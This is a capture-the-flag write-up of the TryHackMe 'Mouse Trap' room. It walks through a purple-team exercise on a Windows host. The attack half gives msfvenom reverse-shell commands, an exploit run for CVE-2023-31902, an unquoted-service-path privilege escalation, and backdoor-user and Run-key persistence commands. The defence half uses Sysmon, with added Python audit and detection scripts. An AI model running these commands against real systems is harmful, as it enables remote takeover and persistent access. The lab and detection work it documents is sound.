# Mouse Trap

{% embed url="<https://tryhackme.com/r/room/mousetrap>" %}

The following post by 0xb0b is licensed under [CC BY 4.0<img src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1" alt="" data-size="line"><img src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1" alt="" data-size="line">](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1)

***

## Jom and Terry Go Purple

Follow the adventures of Jom and Terry, members of the TryMouseMe purple team, as they work through a thrilling exercise of Attack and Defense. From initial access to persistence, you will emulate a three-stage attack on a Windows environment.

### Recon

We start with an Nmap scan of `mousetrap.thm`, which reveals several open ports on a Windows system. The host is running Microsoft services such as RPC (port 135), NetBIOS-SSN (port 139), and SMB (port 445). Remote Desktop Protocol (RDP) is available on port 3389. WinRM is accessible via Microsoft HTTPAPI on port 5985. Port 9099 is initially unidentified.

<figure><img src="/files/w6fIANRbQkJNs04AFwdh" alt=""><figcaption></figcaption></figure>

With a default script and service scan (`-sC -sV`), we see that port 9099 is identified as a Mobile Mouse Server.

```
┌──(0xb0b㉿kali)-[~/Documents/tryhackme/mouse trap]
└─$ nmap -sT -sC -sV -p 135,139,445,3389,5985,7680,9099,9999,35913,47001,49664-49673 -Pn mousetrap.thm

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-15 14:08 EST
Nmap scan report for mousetrap.thm (10.10.58.135)
Host is up (0.038s latency).

PORT      STATE  SERVICE       VERSION
135/tcp   open   msrpc         Microsoft Windows RPC
139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open   microsoft-ds?
3389/tcp  open   ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: MOUSETRAP
|   NetBIOS_Domain_Name: MOUSETRAP
|   NetBIOS_Computer_Name: MOUSETRAP
|   DNS_Domain_Name: MOUSETRAP
|   DNS_Computer_Name: MOUSETRAP
|   Product_Version: 10.0.17763
|_  System_Time: 2024-11-15T19:10:02+00:00
| ssl-cert: Subject: commonName=MOUSETRAP
| Not valid before: 2024-07-03T16:07:31
|_Not valid after:  2025-01-02T16:07:31
|_ssl-date: 2024-11-15T19:10:45+00:00; -1m11s from scanner time.
5985/tcp  open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp  open   pando-pub?
9099/tcp  open   unknown
| fingerprint-strings: 
|   FourOhFourRequest, GetRequest: 
|     HTTP/1.0 200 OK 
|     Server: Mobile Mouse Server 
|     Content-Type: text/html 
|     Content-Length: 326
|_    <HTML><HEAD><TITLE>Success!</TITLE><meta name="viewport" content="width=device-width,user-scalable=no" /></HEAD><BODY BGCOLOR=#000000><br><br><p style="font:12pt arial,geneva,sans-serif; text-align:center; color:green; font-weight:bold;" >The server running on "MOUSETRAP" was able to receive your request.</p></BODY></HTML>
9999/tcp  open   abyss?
35913/tcp open   unknown
47001/tcp open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open   msrpc         Microsoft Windows RPC
49665/tcp open   msrpc         Microsoft Windows RPC
49666/tcp open   msrpc         Microsoft Windows RPC
49667/tcp open   msrpc         Microsoft Windows RPC
49668/tcp open   msrpc         Microsoft Windows RPC
49669/tcp open   msrpc         Microsoft Windows RPC
49670/tcp closed unknown
49671/tcp open   msrpc         Microsoft Windows RPC
49672/tcp closed unknown
49673/tcp open   msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9099-TCP:V=7.94SVN%I=7%D=11/15%Time=67379C49%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,1A7,"HTTP/1\.0\x20200\x20OK\x20\r\nServer:\x20Mobile\x20Mo
SF:use\x20Server\x20\r\nContent-Type:\x20text/html\x20\r\nContent-Length:\
SF:x20326\r\n\r\n<HTML><HEAD><TITLE>Success!</TITLE><meta\x20name=\"viewpo
SF:rt\"\x20content=\"width=device-width,user-scalable=no\"\x20/></HEAD><BO
SF:DY\x20BGCOLOR=#000000><br><br><p\x20style=\"font:12pt\x20arial,geneva,s
SF:ans-serif;\x20text-align:center;\x20color:green;\x20font-weight:bold;\"
SF:\x20>The\x20server\x20running\x20on\x20\"MOUSETRAP\"\x20was\x20able\x20
SF:to\x20receive\x20your\x20request\.</p></BODY></HTML>\r\n")%r(FourOhFour
SF:Request,1A7,"HTTP/1\.0\x20200\x20OK\x20\r\nServer:\x20Mobile\x20Mouse\x
SF:20Server\x20\r\nContent-Type:\x20text/html\x20\r\nContent-Length:\x2032
SF:6\r\n\r\n<HTML><HEAD><TITLE>Success!</TITLE><meta\x20name=\"viewport\"\
SF:x20content=\"width=device-width,user-scalable=no\"\x20/></HEAD><BODY\x2
SF:0BGCOLOR=#000000><br><br><p\x20style=\"font:12pt\x20arial,geneva,sans-s
SF:erif;\x20text-align:center;\x20color:green;\x20font-weight:bold;\"\x20>
SF:The\x20server\x20running\x20on\x20\"MOUSETRAP\"\x20was\x20able\x20to\x2
SF:0receive\x20your\x20request\.</p></BODY></HTML>\r\n");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-11-15T19:10:05
|_  start_date: N/A
|_clock-skew: mean: -1m11s, deviation: 0s, median: -1m11s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 211.88 seconds
```

Visiting the index page confirms the banner: the server is running on `MOUSETRAP`.

<figure><img src="/files/qBDFUaJzLSh51AixLKqY" alt=""><figcaption></figcaption></figure>

With a little research, we can find the following exploit of `CVE-2023-31902`:

{% embed url="<https://github.com/blue0x1/mobilemouse-exploit>" %}

> The exploit has two versions, one that uses SMB and one that uses HTTP. It allows an attacker to execute arbitrary code on the target machine by sending a specially crafted request to the Mobile Mouse server.

### Remote code execution

The room asks us to do the following to gain remote code execution:

> * Once you’ve found the CVE and exploit, use the version that uses SMB, not HTTP
> * Generate a Windows stageless reverse TCP (x64) shell
> * Ensure that your reverse shell is called `shell.exe`

We found an exploit targeting both SMB and HTTP; now we need a reverse shell called `shell.exe`, which we generate with `msfvenom`.

{% code overflow="wrap" %}

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.14.90.235 LPORT=4445 -f exe > shell.exe
```

{% endcode %}

After we generated the shell, we set up a listener on `4445` and run the exploit:

{% code overflow="wrap" %}

```
python CVE-2023-31902-v2.py --target mousetrap.thm --file shell.exe --lhost 10.14.90.235
```

{% endcode %}

<figure><img src="/files/bqALPFECV8YmLJBH9sJf" alt=""><figcaption></figcaption></figure>

We get a connection back and we are `purpletom`.

<figure><img src="/files/LqN2T8aQiTyjBcVe93nz" alt=""><figcaption></figcaption></figure>

In the users' directory of purpletom, we find the user flag.

<figure><img src="/files/yMtphUxmGg3vMVOICnLw" alt=""><figcaption></figcaption></figure>

### Unquoted Service Path

The room now challenges us to abuse an unquoted service path to escalate privileges:

> * Use `SharpUp.exe` for enumeration, located in C:\Users\purpletom
> * Target the `Mobile Mouse` directory while executing the unquoted service path abuse

An **Unquoted Service Path vulnerability** occurs in Windows systems when a service's executable path contains spaces but is not enclosed in quotes. This misconfiguration can allow us to execute a malicious file placed in a higher-priority directory along the path, potentially escalating privileges.

We use `SharpUp.exe` as advised to find the vulnerability. The service runs `HelperService.exe` from an unquoted path that passes through `Mobile Mouse\Mouse Utilities`. Because Windows tries each space-delimited prefix of an unquoted path in turn, placing a `Mouse.exe` in the `Mobile Mouse` folder should cause `Mouse.exe` to be executed when the service starts.
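To make that resolution order concrete, here is an added Python example that is not part of the writeup or the room: it audits service image paths the way a defender would, flagging unquoted paths that contain spaces and listing the files `CreateProcess` would try before reaching the intended binary. The service list is constructed; the Mobile Mouse entry assumes the layout `...\Mobile Mouse\Mouse Utilities\HelperService.exe` described above, and the `.exe`-appending rule follows the documented `CreateProcess` behaviour.

```python
"""Audit Windows service ImagePath strings for the unquoted-path weakness.

Added example for this writeup (not the room's or the author's code). Given
the ImagePath of a service, decide whether it is unquoted and contains
spaces, and list in order the files CreateProcess would try before reaching
the intended binary. SAMPLE_SERVICES is constructed for illustration; the
Mobile Mouse entry assumes the layout described in the SharpUp output above.
"""
from __future__ import annotations

import re

# Constructed sample of (service name, ImagePath) pairs, shaped like the
# output of `wmic service get name,pathname` or Win32_Service.PathName.
SAMPLE_SERVICES = [
    ("Mobile Mouse Service",
     r"C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe"),
    ("Quoted Vendor Tool", r'"C:\Program Files\Vendor Tool\svc.exe" -run'),
    ("Svchost Group", r"C:\Windows\system32\svchost.exe -k netsvcs"),
    ("Spaces Only In Args", r"C:\Tools\agent.exe --config C:\Tools\my config.ini"),
]

# For an unquoted ImagePath, everything up to the first ".exe" is the
# executable; anything after it is treated as arguments.
FIRST_EXE = re.compile(r"^(.*?\.exe)", re.IGNORECASE)


def executable_part(image_path: str) -> tuple[str, bool]:
    """Return (executable path, was_quoted) with any arguments removed."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return (s[1:end] if end != -1 else s[1:]), True
    m = FIRST_EXE.match(s)
    if m:
        return m.group(1), False
    # No ".exe" at all: fall back to the first whitespace-delimited token.
    return (s.split()[0] if s.split() else ""), False


def search_order(exe_path: str) -> list[str]:
    """Paths CreateProcess tries, in order, for an unquoted path with spaces.

    Each space yields one prefix; when the prefix's last path component has
    no extension, ".exe" is appended (the documented CreateProcess rule).
    """
    tokens = exe_path.split(" ")
    order = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if "." not in prefix.rsplit("\\", 1)[-1]:
            prefix += ".exe"
        order.append(prefix)
    return order


def is_vulnerable(image_path: str) -> bool:
    """True when the executable path is unquoted and contains a space."""
    exe, quoted = executable_part(image_path)
    return not quoted and " " in exe


def audit(services: list[tuple[str, str]]) -> dict[str, list[str]]:
    """Map each vulnerable service to the files tried before its real binary."""
    findings = {}
    for name, image_path in services:
        if is_vulnerable(image_path):
            exe, _ = executable_part(image_path)
            findings[name] = search_order(exe)[:-1]
    return findings


if __name__ == "__main__":
    for name, tried_first in audit(SAMPLE_SERVICES).items():
        print(f"[!] {name}: unquoted ImagePath with spaces")
        for candidate in tried_first:
            print(f"    would be tried first: {candidate}")
```

On a real host the same audit runs over the output of `wmic service get name,pathname` or `Get-CimInstance Win32_Service`; any listed candidate whose directory is writable by a standard user (as `C:\Program Files (x86)\Mobile Mouse` is here) is the finding to fix, normally by quoting the `ImagePath`.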

<figure><img src="/files/KVRd25I8Wkma8m5RIfv8" alt=""><figcaption></figcaption></figure>

Next, we create a suitable executable that will run when placed in the unquoted path and the service is run.

{% code overflow="wrap" %}

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.14.90.235 LPORT=4446 -f exe > mouse.exe
```

{% endcode %}

<figure><img src="/files/drgOeGKyi7Sj6V3ayJRw" alt=""><figcaption></figcaption></figure>

As a user, we are allowed to write to `C:\Program Files (x86)\Mobile Mouse`.

<figure><img src="/files/HTqLNlaaeS7DG1DkrvrG" alt=""><figcaption></figcaption></figure>

Next, we start a Python web server on our machine and use the PowerShell `curl` alias (`Invoke-WebRequest`) to download the crafted executable. We place it in `C:\Program Files (x86)\Mobile Mouse`.

```
curl http://10.14.90.235/mouse.exe -o mouse.exe
```

<figure><img src="/files/oel07GTMvmcXCOG8D35l" alt=""><figcaption></figcaption></figure>

We list the available services via the following command:

```
wmic service list brief
```

<figure><img src="/files/GxCkThTaX0MnAINQWKrD" alt=""><figcaption></figcaption></figure>

There is the mobile mouse service:

<figure><img src="/files/wbxojoHnbQFeybAPzfmM" alt=""><figcaption></figcaption></figure>

Next, we set up a listener on port `4446`. Via `net start "Mobile Mouse Service"` we run the service.

<figure><img src="/files/oFIPqn2uWmEfLodH4UHz" alt=""><figcaption></figcaption></figure>

We get a connection back as `NT AUTHORITY\SYSTEM`. On the Administrator user's Desktop, we find the `root` flag.

<figure><img src="/files/DhFbpQa6EANg8VNfdcGq" alt=""><figcaption></figcaption></figure>

Furthermore, we are able to spot some credentials for the `admin` user.

<figure><img src="/files/f3sMBn3IvRZ3OH9g2xIA" alt=""><figcaption></figcaption></figure>

### Registry run keys and local account creation

The next step is to establish persistence by adding the Run-key entry `shell` under `Software\Microsoft\Windows\CurrentVersion\Run` with the value `C:\Windows\Temp\shell.exe`, and by creating a backdoor user `terry`. The room specifies:

> * Use the `HKEY_CURRENT_USER` registry hive
> * Use the `SYSTEM user` when creating the run key persistence
> * Specify the registry key name (`shell`)
> * Use the following path for the payload (`C:\Windows\Temp\shell.exe`)
> * Specify the name of the backdoor user (`terry`)

After running the following two commands, we execute `checker.exe` on `C:\Users\Administrator\Desktop` to reveal the final flag.

{% code overflow="wrap" %}

```
net user terry 12asdf$123 /add
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v shell /t REG_SZ /d "C:\Windows\Temp\shell.exe" /f
```

{% endcode %}

<figure><img src="/files/jpUwnEKwJ2oaujxmHarm" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
The procedure is prescribed this strictly so that the subsequent analysis matches it exactly. In the original version of the room there was only one machine; to keep things fair and give everyone the same environment, there is now a separate machine for each part.
{% endhint %}

## Time to Catch Terry

Now we switch to the blue side and reconstruct what happened from the Sysmon event logs with `SysmonView`. Following the steps shown in the room, we export the Sysmon logs as XML and then import them into `SysmonView`.

### What is the name of the payload that was shared?

The first question asks for the name of the payload that was shared. On the first page, we have a list of DLLs and executables. By clicking on each of them, we can see its image path. The executable `payload.exe` looks suspicious, and clicking on it shows that its image path is indeed a shared folder.

<figure><img src="/files/SWYFIJBil9St6ggPq6EQ" alt=""><figcaption></figcaption></figure>

### What is the attacker's IP address?

We have already identified the suspicious executable; the attacker's IP is part of the share path shown as its image path.

For the following questions we use the same workflow: clicking on the image path lists a session, clicking on the session shows an event graph, and each event in the graph can be inspected.

<figure><img src="/files/pd7Kli95a8byMNh3XJVp" alt=""><figcaption></figcaption></figure>

Clicking on the Process Create event reveals the same IP, which answers the second question.

<figure><img src="/files/E03cbBpRLFP5kzIZ0eSq" alt=""><figcaption></figcaption></figure>

### What is the full command-line of the executed payload?

As we have already shown above, we inspect the `Process Create` event. Here we see the command line issued.

<figure><img src="/files/7oF4E1bvi6VdEfhtFYsc" alt=""><figcaption></figcaption></figure>

### What is the full command-line of the tool used to enumerate the privilege escalation vectors?

Besides the event graphs, we can also use the View All Events tab. Since we know from the red-team part that `SharpUp.exe` was used, we search for it there and find the tool's full command line.

<figure><img src="/files/qXP4KLTfJ9tWuvEI2JXs" alt=""><figcaption></figcaption></figure>

### When was this tool executed?

At the same entry, we are able to locate the time executed.

{% hint style="info" %}
This might be wrong
{% endhint %}

<figure><img src="/files/0TlcR95LPyqKN6KZqVcH" alt=""><figcaption></figcaption></figure>

The actual time of execution was a bit earlier:

<figure><img src="/files/ifhjIXTFRSf8w9JNcDm3" alt=""><figcaption></figcaption></figure>

### What command was used to transfer the reverse shell binary into the system?

Since we already know the IP of the attacker, we can search for this in All Events View. There we will find the command used to transfer the reverse shell.

<figure><img src="/files/Wa2pew7oGvvGxDMorXLv" alt=""><figcaption></figcaption></figure>

### What is the full command line value of the process created during the unquoted service path abuse?

As we know from the attack, we are looking for something like `Mouse.exe`. In the All Events View, we drag the GUID column into the grouping field (2) and search for Mouse.exe. Several sessions are listed; of interest are those around the time of the attack (8/6/2024 4:20). One session points to cmd.exe. Selecting it and opening it via (4) and (5) shows the event graph, and clicking on its Process Create event shows that the parent command line contains the path to HelperService.exe.

<figure><img src="/files/3XEOb9QNkhyEUHfM8pim" alt=""><figcaption></figcaption></figure>

### What was the password set for the user created by the attacker for persistence?

The next question asks for the password of the user the attacker created. We could go through all sessions around the time of the attack, but it is quicker to return to the Process View tab and look for `net.exe`, which is used to add local users. There we find a session where a user was created around the time of the attack.

<figure><img src="/files/fA1iGfHRVBanxa0aQ62d" alt=""><figcaption></figcaption></figure>

### What is the key name used for persistence?

As with the user, we could go through all sessions in the View All Events tab at the time of the attack. However, we can also search explicitly for `reg.exe` in the Process View tab. There we find a session revealing both the key name and the target path used by the attacker.

<figure><img src="/files/owuAjUARrcblytP1aUaS" alt=""><figcaption></figcaption></figure>

### What is the target path of the persistence implant by the attacker?

The same `reg.exe` session found in the Process View tab for the previous question also reveals the target path of the persistence implant.

<figure><img src="/files/tpLVxkwN1a2oRSZ5yAOf" alt=""><figcaption></figcaption></figure>
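Every question in this section is answered from Sysmon Event ID 1 (Process Create) records: the payload launched from a share, the binary that ran from the unquoted service path, the `net.exe` user creation and the `reg.exe` Run-key write. The following Python example is added here and is not the room's or the writeup's code; it parses a Sysmon XML export in the shape Event Viewer produces and applies those four checks automatically instead of clicking through `SysmonView`. The embedded XML is constructed to resemble the room's events; the IP, timestamps and password in it are placeholders, not the room's answers, and the unquoted-path rule relies on the fact that the Service Control Manager passes the service's `ImagePath` as the command line of the process it starts, so the `Image` that actually ran differs from the executable its own `CommandLine` names.

```python
"""Triage a Sysmon XML export for the traces examined in this section.

Added example, not the room's or the writeup's code. Parses Event ID 1
(Process Create) records as Event Viewer exports them and applies four rules:
execution from a network share, an unquoted-service-path hijack, local user
creation via net.exe, and a Run-key entry added via reg.exe. SAMPLE_XML is
constructed; IP, times and password are placeholders, not the room's answers.
"""
import re
import xml.etree.ElementTree as ET

SYSMON_NS = "http://schemas.microsoft.com/win/2004/08/events/event"
NS = {"e": SYSMON_NS}


def _event(time, image, cmd, user, event_id=1):
    """Build one constructed Sysmon <Event> in the exported-XML shape."""
    return (f'<Event xmlns="{SYSMON_NS}"><System><EventID>{event_id}</EventID>'
            f'<TimeCreated SystemTime="{time}"/></System><EventData>'
            f'<Data Name="Image">{image}</Data><Data Name="CommandLine">{cmd}</Data>'
            f'<Data Name="User">{user}</Data></EventData></Event>')


SAMPLE_XML = "<Events>" + "".join([
    _event("2024-08-06T16:18:02Z", r"\\10.0.0.5\share\payload.exe",
           r"\\10.0.0.5\share\payload.exe", r"MOUSETRAP\purpletom"),
    # Service started via the unquoted path: the SCM passes the ImagePath as
    # the command line, but the Image that actually ran is Mouse.exe.
    _event("2024-08-06T16:20:31Z", r"C:\Program Files (x86)\Mobile Mouse\Mouse.exe",
           r"C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe",
           r"NT AUTHORITY\SYSTEM"),
    _event("2024-08-06T16:22:05Z", r"C:\Windows\System32\net.exe",
           "net user terry Placeh0lder! /add", r"NT AUTHORITY\SYSTEM"),
    _event("2024-08-06T16:22:40Z", r"C:\Windows\System32\reg.exe",
           r'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" '
           r'/v shell /t REG_SZ /d "C:\Windows\Temp\shell.exe" /f', r"NT AUTHORITY\SYSTEM"),
    _event("2024-08-06T16:23:00Z", r"C:\Windows\System32\svchost.exe",   # benign control
           r"C:\Windows\System32\svchost.exe -k netsvcs", r"NT AUTHORITY\SYSTEM"),
]) + "</Events>"


def parse_process_creates(xml_text):
    """Return Event ID 1 records as {field: value} dicts, in file order."""
    records = []
    for ev in ET.fromstring(xml_text).iter("{%s}Event" % SYSMON_NS):
        if ev.findtext("e:System/e:EventID", namespaces=NS) != "1":
            continue
        rec = {"Time": ev.find("e:System/e:TimeCreated", NS).get("SystemTime")}
        for d in ev.findall("e:EventData/e:Data", NS):
            rec[d.get("Name")] = d.text or ""
        records.append(rec)
    return records


def share_execution(rec):
    """Image launched from a UNC path: report the host and the file name."""
    m = re.match(r"\\\\([^\\]+)\\", rec.get("Image", ""))
    return {"host": m.group(1), "payload": rec["Image"].rsplit("\\", 1)[-1]} if m else None


def unquoted_path_hijack(rec):
    """The executable named in CommandLine is not the Image that ran, and the
    Image (minus .exe) is a space-terminated prefix of it: the signature of an
    unquoted service path resolving to a planted binary."""
    image, cmd = rec.get("Image", "").lower(), rec.get("CommandLine", "").lower()
    m = re.match(r"(.*?\.exe)", cmd)
    if not m or cmd.startswith('"') or not image.endswith(".exe"):
        return False
    return m.group(1) != image and m.group(1).startswith(image[:-4] + " ")


def local_user_added(rec):
    """net.exe / net1.exe 'user <name> <password> /add'."""
    if not rec.get("Image", "").lower().endswith(("\\net.exe", "\\net1.exe")):
        return None
    m = re.search(r"\buser\s+(\S+)\s+(\S+)\s+/add\b", rec.get("CommandLine", ""), re.I)
    return {"user": m.group(1), "password": m.group(2)} if m else None


def run_key_persistence(rec):
    """reg.exe writing under ...\\CurrentVersion\\Run or RunOnce."""
    cmd = rec.get("CommandLine", "")
    if (not rec.get("Image", "").lower().endswith("\\reg.exe")
            or not re.search(r"\\CurrentVersion\\Run(Once)?\b", cmd, re.I)):
        return None
    hive = re.search(r"\b(HK[A-Z_]+)", cmd)
    value = re.search(r"/v\s+(\S+)", cmd, re.I)
    data = re.search(r'/d\s+(?:"([^"]*)"|(\S+))', cmd, re.I)
    return {"hive": hive.group(1) if hive else "",
            "value": value.group(1) if value else "",
            "target": (data.group(1) or data.group(2)) if data else ""}


def triage(xml_text):
    """Run every rule over each Process Create record; yield (rule, time, details)."""
    findings = []
    for rec in parse_process_creates(xml_text):
        if (hit := share_execution(rec)):
            findings.append(("share_execution", rec["Time"], hit))
        if unquoted_path_hijack(rec):
            findings.append(("unquoted_path_hijack", rec["Time"],
                             {"image": rec["Image"], "command": rec["CommandLine"]}))
        if (hit := local_user_added(rec)):
            findings.append(("local_user_added", rec["Time"], hit))
        if (hit := run_key_persistence(rec)):
            findings.append(("run_key_persistence", rec["Time"], hit))
    return findings


if __name__ == "__main__":
    for rule, when, details in triage(SAMPLE_XML):
        print(f"{when}  {rule}: {details}")
```

Pointing `triage()` at the XML exported from Event Viewer (or `wevtutil qe Microsoft-Windows-Sysmon/Operational /f:xml`) yields the same four answers the manual `SysmonView` walk-through produces, in chronological order. The `net.exe` rule will also fire on the `net1.exe` child that `net.exe` spawns, so expect that finding twice on real logs; the password appears in the command line only because `net user` passes it as a plain argument, which is exactly why Sysmon command-line logging catches it.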
